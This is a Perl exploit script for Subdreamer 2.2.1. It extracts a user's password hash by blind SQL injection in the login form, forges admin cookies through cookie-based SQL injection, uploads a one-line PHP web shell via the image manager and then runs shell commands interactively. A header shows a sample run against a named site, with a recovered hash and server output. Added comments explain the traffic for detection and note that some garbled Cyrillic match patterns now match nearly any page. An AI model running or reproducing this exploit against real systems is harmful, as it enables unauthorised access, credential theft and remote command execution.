  1. ==========================================================
  2. Subdreamer 2.2.1 SQL Injection / Command Execution Exploit
  3. ==========================================================
  4.  
  5.  
  6.  
  7.  
  8.  
  9. #!/usr/bin/perl
  10.  
  11. ## Subdreamer 2.2.1 command exec exploit
  12. ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  13. ## supported targets:
  14. ## ~ without forum integration
  15. ## ~ with phpBB2 integration
  16. ## ~ with ipb2 integration
  17. ## ~ with vbulletin2 integration
  18. ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  19. ## (c)oded by 1dt.w0lf - 19/09/2005
  20. ## RST/GHC
  21. ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  22.  
  23. ## work:
  24. ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  25. ## r57subdreamer.pl -p http://subdreamer.com.ru/ -u 2 -t 1
  26. ## ------------------------------------------------------------------
  27. ## [~] PATH : http://subdreamer.com.ru/
  28. ## [~] USER : 2
  29. ## [~] TARGET : 1 - PhpBB2
  30. ## [1] STEP 1 : TRY GET USER PASSWORD
  31. ## [~] SEARCHING PASSWORD ... [ DONE ]
  32. ## -----------------------------------------------------------
  33. ## USER_ID: 2
  34. ## PASS: 26310e438a5a1fb8622738f1e5d34f8b
  35. ## -----------------------------------------------------------
  36. ## [2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE
  37. ## [+] DONE! THIS USER HAVE ACCESS!
  38. ## [3] STEP 3 : UPLOAD FILE
  39. ## [+] DONE! FILE "img.php" UPLOADED
  40. ## [+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)
  41. ## SUBDREAMER# id; uname -a; ls -la;
  42. ## ----------------------------------------------------------------
  43. ## uid=1003(apache) gid=1003(apache) groups=1003(apache)
  44. ## FreeBSD customer-3314.cit-network.net 5.3-RELEASE FreeBSD 5.3-RELEASE #0:
  45. ## Fri Nov 5 04:19:18 UTC 2004 root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
  46. ## total 24
  47. ## drwxrwxrwx 5 enshteyn apache 512 Sep 19 23:04 .
  48. ## drwxr-x--- 10 enshteyn apache 512 Sep 17 21:03 ..
  49. ## drwxr-xr-x 2 enshteyn apache 512 Sep 10 14:09 Image
  50. ## -rw-r--r-- 1 apache apache 48 Sep 19 23:04 img.php
  51. ## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 logos
  52. ## drwxrwxrwx 2 enshteyn apache 512 Sep 10 14:09 smilies
  53. ## ----------------------------------------------------------------
  54. ## SUBDREAMER# exit
  55. ## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  56.  
## config
## ------
##
## images folder
## Name of the image directory below the Subdreamer root.  It is used twice:
## as the `folderpath` of the upload request in upload_file() and as the URL
## prefix that run() posts to afterwards, so the two must agree.
$img_folder = 'images';
## or try
##$img_folder = 'images/logos';
##
## end config
  66.  
  67. use LWP::UserAgent;
  68. use HTTP::Cookies;
  69. use Getopt::Std;
  70.  
# Command-line options (the full text is in usage()):
#   -p  base URL of the Subdreamer install   -u  numeric user id
#   -h  optional, already known password hash  -t  index into @targets
# Getopt::Std leaves the values in the package globals $opt_p etc.  Every
# other variable in this script is a package global too (no `use strict`),
# and several of them are shared between the subs further down.
getopts('u:p:h:t:');

$path = $opt_p;
$user = $opt_u;
$hash = $opt_h;
$target = $opt_t || 0;   # `-t 0` and a missing -t are indistinguishable here

$s_num = 1;   # 1-based position of the hash character currently probed; read by check()
$|++;         # unbuffered STDOUT so the spinner and the prompt show up immediately
$n = 0;       # request counter; its only use is driving the spinner in status()
  81.  
# One row per supported target layout:
#   [ display name, user-id column, password column, cookie name 1, cookie name 2 ]
# The two column names are spliced into the injected SQL in check(); the
# cookie names are what check_admin_rights() and upload_file() set.  Empty
# strings mark fields a target does not use - rows 3-5 are the cookie
# injection variants, for which the main flow skips step 1 entirely.
@targets = (
    #['target name','column1 in database','column2 in database','cookie name 1','cookie name 2']
    ['Subdreamer without forum','userid','password','sduserid','sdpassword'],
    ['PhpBB2','user_id','user_password','phpbb2mysql_data',''],
    ['IPB2','id','member_login_key','member_id','pass_hash'],
    ['PhpBB2 cookie injection','','','phpbb2mysql_data',''],
    ['IPB2 cookie injection','id','','member_id','pass_hash'],
    ['Vbulletin cookie injection','userid','','bbuserid','bbpassword'],
);
  91.  
# ---- main flow ----------------------------------------------------------
# Valid target indices are the rows of @targets (0..5); anything else, or a
# missing -p / -u, prints the usage text and exits.
if (!$path || !$user || $target<0 || $target>5) { &usage; }
&head();
if($path=~/[^\/]$/) { $path .= '/'; }   # normalise to a trailing slash; later URLs are built by plain concatenation
print "[~] PATH : $path\r\n";
print "[~] USER : $user\r\n";
print "[~] TARGET : $target - $targets[$target][0]\r\n";
# Step 1 only applies to the three targets whose password column is known
# (rows 0-2); rows 3-5 forge cookies without a hash.
if($target==1||$target==2||$target==0) {
    print "[1] STEP 1 : TRY GET USER PASSWORD\r\n";
    if(!$hash){
        print "[~] SEARCHING PASSWORD ... [|]";

        # Recovers the hash one character at a time through the boolean
        # oracle in check().  found(47,58) covers the ASCII codes of '0'..'9'
        # and found(96,103) those of 'a'..'f' - the hex alphabet of the
        # 32-character MD5 shown in the transcript above.  Both calls leave
        # the matched code in the global $i (0 when nothing in the range
        # matched); the return value of the first call is only used to
        # decide whether the second range has to be tried.
        FIND: while(1)
        {
            if(&found(47,58)==0) { &found(96,103); }
            $char = $i;
            if ($char=="0")   # numeric compare; 0 means no character at position $s_num, i.e. the end of the hash
            {
                if(length($allchar) > 0){
                    print qq{\b\b DONE ]
-----------------------------------------------------------
USER_ID: $user
PASS: $allchar
-----------------------------------------------------------
};
                    last FIND;
                }
                else
                {
                    print "\b\b FAILED ]";
                }
                exit();   # only reached on the FAILED branch; DONE leaves the loop above
            }
            else
            {
                $allchar .= chr($char);
            }
            $s_num++;   # advance the substring() position that check() probes
        }
    }
    else
    {
        print "[~] SKIP. HASH EXISTS\r\n";
        $allchar = $hash;
    }
}

print "[2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE\r\n";
if(&check_admin_rights())
{
    print "[+] DONE! THIS USER HAVE ACCESS!\r\n";
}
else
{
    print "[-] DAMN! THIS USER NOT ADMIN =(\r\n";
    exit();
}

print "[3] STEP 3 : UPLOAD FILE\r\n";
if(&upload_file())
{
    print "[+] DONE! FILE \"img.php\" UPLOADED\r\n";
}
else
{
    print "[-] DAMN! UPLOAD ERROR =(\r\n";
    exit();
}
print "[+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)\r\n";

# Interactive prompt.  `while ()` with an empty condition loops forever; the
# inner while reads exactly one line and then `last`s.  run() ignores the
# argument it is given and reads the global $cmd set here.  On STDIN EOF the
# inner body never runs, so the previous $cmd is re-sent on every iteration.
while ()
{
    print "SUBDREAMER# ";
    while(<STDIN>)
    {
        $cmd=$_;
        chomp($cmd);
        exit() if ($cmd eq 'exit');
        last;
    }
    &run($cmd);
}
  173.  
# Binary search for the ASCII code of the hash character at position $s_num
# within [$fmin, $fmax].  Each round asks the oracle in check() whether the
# code lies in the upper part (" BETWEEN $r AND $fmax"); once the window is
# narrower than 5 it hands over to crack(), which tests the remaining codes
# one by one.  The matched code (or 0) is stored in the global $i, which is
# what the main loop reads; the sub's own value relies on Perl returning the
# last evaluated expression, i.e. the recursive call.  $r and $check are
# globals as well.  The ($$) prototype is not argument validation, and the
# `&found(...)` call form bypasses it anyway.
sub found($$)
{
    my $fmin = $_[0];
    my $fmax = $_[1];
    if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

    $r = int($fmax - ($fmax-$fmin)/2);   # midpoint; int() truncates
    $check = " BETWEEN $r AND $fmax";
    if ( &check($check) ) { &found($r,$fmax); }
    else { &found($fmin,$r); }
}
  185.  
# Linear probe of the codes $cmin .. $cmax-1 (upper bound exclusive) through
# check("=$i").  Returns the first code for which the oracle answers true, or
# 0 when none does; the global $i is left holding the same value either way.
sub crack($$)
{
    my $cmin = $_[0];
    my $cmax = $_[1];
    $i = $cmin;
    while ($i<$cmax)
    {
        $crcheck = "=$i";   # $crcheck is a global, like every other working variable here
        if ( &check($crcheck) ) { return $i; }
        $i++;
    }
    $i = 0;
    return $i;
}
  200.  
# The boolean oracle behind found()/crack().  Sends one login POST to
# index.php whose `loginusername` field carries the injection
#   no_such_user' OR (<idcol>=<user> AND (ascii(substring(<pwcol>,$s_num,1))<cond>)) /*
# where <cond> is " BETWEEN x AND y" or "=x".  A "Wrong Password" page is
# taken to mean the condition held (return 1); any other page returns 0, and
# a "Database error" / "Invalid SQL" page aborts the whole script.
# For detection: the `' OR (` and `ascii(substring(` fragments in the
# loginusername parameter and the constant loginpassword value below are the
# distinctive parts of this traffic; the probe count for one hash is on the
# order of a few requests per character.
# Globals touched: $n, $ccheck, $username, $xpl, $res, @results, $result.
sub check($)
{
    $n++;
    status();   # advance the spinner
    $ccheck = $_[0];
    $username = "no_such_user' OR (".$targets[$target][1]."=".$user." AND (ascii(substring(".$targets[$target][2].",".$s_num.",1))".$ccheck.")) /*";

    $xpl = LWP::UserAgent->new() or die;
    $res = $xpl->post($path.'index.php',
    {
        "loginusername" => $username,
        "loginpassword" => "nap0Jlb_Haxep",
        "login" => "login",
        "Submit now" => "Login"
    }
    );
    @results = $res->content;   # content() yields one string, so this is a one-element list and the loop runs once

    foreach $result(@results)
    {
        if ($result =~ /(Database error)|(Invalid SQL)/i)
        {
            print "\r\n[-] SQL SYNTAX ERROR! CHECK TARGET!\r\n";
            exit();
        }
        #print $result;
        # english pattern
        if ($result =~ /Wrong Password/) { return 1; }
        # russian pattern
        # NOTE(review): the three "russian" patterns below lost their non-ASCII
        # (Cyrillic) bytes when the listing was copied; each `.` now matches
        # any character, so as written they match almost any response body.
        if ($result =~ /...... ......./) { return 1; }
        # russian pattern 2
        if ($result =~ /............ ....../) { return 1; }
        # russian pattern 3 ( KOI8-R tested on subdreamer.com.ru )
        if ($result =~ /...... ......./) { return 1; }
    }
    return 0;
}
  238.  
  239. sub status()
  240. {
  241. $status = $n % 5;
  242. if($status==0){ print "\b\b/]"; }
  243. if($status==1){ print "\b\b-]"; }
  244. if($status==2){ print "\b\b\\]"; }
  245. if($status==3){ print "\b\b|]"; }
  246. }
  247.  
# Step 2: decide whether the user reaches the admin area.  Builds a cookie
# jar for the chosen target and GETs admin/index.php with it:
#   target 1    - a URL-encoded, PHP-serialised phpbb2 autologin cookie
#                 (a:2:{s:11:"autologinid";s:32:"<hash>";s:6:"userid";...})
#                 carrying the recovered hash, which therefore must be 32 chars
#   target 3    - the same cookie shape, but the userid value ends in `' /*`
#                 (injection through the cookie; no hash needed)
#   targets 4,5 - two cookies; the second is `/**/OR/**/<idcol>=<user>`
#   otherwise   - plain user-id / hash cookies (targets 0 and 2)
# Returns 0 when the response still contains the login form (marker
# "loginpassword") and 1 for anything else; a response that merely lacks the
# marker, an error page for instance, also counts as access.  The cookie
# domain is cut out of $path by a regex that only understands http://.
# The trailing empty arguments to set_cookie leave port, path_spec, secure,
# maxage and discard unset.  This cookie-building branch is duplicated
# verbatim in upload_file().
sub check_admin_rights()
{
    $xpl = LWP::UserAgent->new() or die;
    $cookie_jar = HTTP::Cookies->new( );
    $xpl->cookie_jar( $cookie_jar );
    ($host = $path) =~ s!http://([^/]*).*!$1!;   # host[:port] part of the URL, used as cookie domain

    if($target == 1)
    {
        # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ???
        #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,);
        # default phpbb2 cookie
        $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);
    }
    elsif($target == 3)
    {
        # phpbb2 cookie with sql injection
        $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,);
    }
    elsif($target == 4)
    {
        # ipb2 cookie with sql injection
        $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);
        $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
    }
    elsif($target == 5)
    {
        # Vbulletin cookie with sql injection
        $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);
        $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
    }
    else
    {
        # subdreamer || ipb2 cookies
        $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);
        $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);
    }

    $res = $xpl->get($path."admin/index.php");
    if($res->content =~ /loginpassword/) { return 0; }
    else { return 1; }
}
  290.  
# Step 3: with the same forged cookies as check_admin_rights() (the branch
# is copied verbatim), POSTs a multipart form to admin/imagemanager.php with
# action=uploadimage.  The `image` part is a file named img.php whose body
# is the one-line PHP `passthru($_POST[cmd])` wrapper below, declared as
# text/plain; `folderpath` is "../$img_folder/", so the file lands in the
# image directory that run() posts to afterwards.
# Returns 1 on "Settings Updated", 0 on "Uploading Errors" and 1 for any
# other response (the final else) - only an explicit upload error is
# reported as failure.
# For responders: the artefact is a .php file in the images directory with
# that exact content (48 bytes, owned by the web-server user in the sample
# transcript above), preceded in the access log by a multipart POST to
# admin/imagemanager.php.
sub upload_file()
{
    $xpl = LWP::UserAgent->new() or die;
    $cookie_jar = HTTP::Cookies->new( );
    $xpl->cookie_jar( $cookie_jar );
    ($host = $path) =~ s!http://([^/]*).*!$1!;   # host[:port] part of the URL, used as cookie domain

    if($target == 1)
    {
        # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ???
        #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,);
        # default phpbb2 cookie
        $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);
    }
    elsif($target == 3)
    {
        # phpbb2 cookie with sql injection
        $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,);
    }
    elsif($target == 4)
    {
        # ipb2 cookie with sql injection
        $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);
        $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
    }
    elsif($target == 5)
    {
        # Vbulletin cookie with sql injection
        $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);
        $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
    }
    else
    {
        # subdreamer || ipb2 cookies
        $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);
        $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);
    }

    # HTTP::Request::Common file-part syntax: [ local file (undef = none), remote filename, headers/content ]
    $res = $xpl->post($path.'admin/imagemanager.php',Content_Type => 'form-data',
    Content => [
        'action' => 'uploadimage',
        'folderpath' => "../$img_folder/",
        'MAX_FILE_SIZE' => '1000000',
        'image' => [
            undef,
            'img.php',
            Content_type => 'text/plain',
            Content => '<? if($_POST[cmd]) { passthru($_POST[cmd]); } ?>',
        ],
        'submit' => 'Upload Image',
    ],
    );
    if($res->content =~ /Settings Updated/) { return 1; }
    if($res->content =~ /Uploading Errors/) { return 0; }
    else { return 1; }
}
  347.  
# Sends one command to the uploaded img.php as the POST field `cmd` and
# prints the raw response body between two rulers.  The argument the main
# loop passes is ignored; the command comes from the global $cmd.  There is
# no error handling - whatever body LWP returns is printed as is.  The empty
# prototype is irrelevant because the caller uses the `&run(...)` form.
sub run()
{
    $xpl = LWP::UserAgent->new() or die;
    $res = $xpl->post($path.$img_folder.'/img.php',{'cmd'=>$cmd});
    print "----------------------------------------------------------------\r\n";
    print $res->content;
    print "----------------------------------------------------------------\r\n";
}
  356.  
  357. sub usage()
  358. {
  359. &head();
  360. print q(| |
  361. | - Usage: |
  362. | r57subdreamer.pl -p <path> -u <user_id> [-t <target>] [-h <hash>] |
  363. | <path> - Path to subdreamer folder |
  364. | <user_id> - User id for bruteforce |
  365. | <hash> - MD5 password hash for this user if you have it =\) |
  366. | - Available targets: |
  367. | - brute password: |
  368. | 0 - Subdreamer without forum integration ( default ) |
  369. | 1 - Subdreamer with PhpBB2 integration |
  370. | 2 - Subdreamer with IPB2 integration |
  371. | - cookie sql injection, dont need brute password: |
  372. | 3 - Subdreamer with PhpBB2 integration 2 |
  373. | 4 - Subdreamer with IPB2 integration 2 |
  374. | 5 - Subdreamer with Vbulletin integration |
  375. +--------------------------------------------------------------------+
  376. | e.g.: |
  377. | r57subdreamer.pl -p http://127.0.0.1/subdreamer/ -u 1 |
  378. | r57subdreamer.pl -p http://www.subdreamer.com.ru -u 2 -t 1 |
  379. +--------------------------------------------------------------------+
  380. );
  381. exit();
  382. }
  383.  
  384. sub head()
  385. {
  386. print q(
  387. +--------------------------------------------------------------------+
  388. | Subdreamer version 2.2.1 sql injection + command execution exploit |
  389. | by 1dt.w0lf |
  390. | RST/GHC |
  391. +--------------------------------------------------------------------+
  392. );}
  393.  
  394.  
  395.  
  396. # 0day.today [2016-04-19] #